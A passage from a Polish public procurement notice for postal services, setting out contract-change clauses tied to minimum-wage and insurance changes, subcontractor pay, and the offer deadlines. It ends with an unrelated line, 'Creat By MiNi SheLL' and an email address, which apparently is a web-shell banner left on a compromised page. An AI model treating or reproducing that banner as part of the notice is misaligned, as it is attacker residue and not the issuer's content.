przedłożeniu dowodów<br/>potwierdzających wpływ zmian, o jakich mowa w ust. 10 pkt. 2, 3 i 4 umowy na koszty wykonania zamówienia przez<br/>Wykonawcę, nie wcześniej jednak niż od wejścia w życie przepisów, dotyczących zmiany minimalnego wynagrodzenia za<br/>pracę albo minimalnej stawki godzinowej lub zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniom<br/>zdrowotnym lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne lub zasad gromadzenia wysokości<br/>wpłat do pracowniczych planów kapitałowych.<br/>4. W przypadku zmian, o których mowa w ust. 10 pkt. 2, 3 i 4 umowy, wynagrodzenie Wykonawcy ulegnie zmianie o wartość<br/>wykazanych całkowitych kosztów ponoszonych przez Wykonawcę z tego tytułu.<br/>5. Jeżeli ceny aktualnych usług pocztowych będą niższe, aniżeli ceny wynikające<br/>z Formularza ofertowego, stanowiącego Załącznik nr 2 do umowy, Wykonawca zobowiązany jest do naliczenia<br/>wynagrodzenia przy zastosowaniu cen jednostkowych wynikających z cennika.<br/>6. Zmiana o której mowa w ust. 15 umowy może nastąpić:1) raz na 12 miesięcy,<br/>2) gdy zmiana kosztów towarów lub usług ma wpływ na koszty realizacji niniejszej umowy co zobowiązany jest wykazać<br/>Wykonawca.<br/>7. Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z ust. 15 umowy, zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy,<br/>z którym Wykonawca zawarł umowę o podwykonawstwo, w zakresie odpowiadającym zmianom cen materiałów lub kosztów<br/>dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione są następujące warunki:<br/>1) przedmiotem umowy są usługi stanowiące nie wykonaną część przedmiotu umowy;<br/>2) okres obowiązywania umowy z podwykonawcą przekracza 12 miesięcy.<br/>8. Wszelkie zmiany do niniejszej umowy wymagają zgody Zamawiającego oraz muszą być dokonane pod rygorem<br/>nieważności w formie pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-22 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kielce-praca.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-22 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com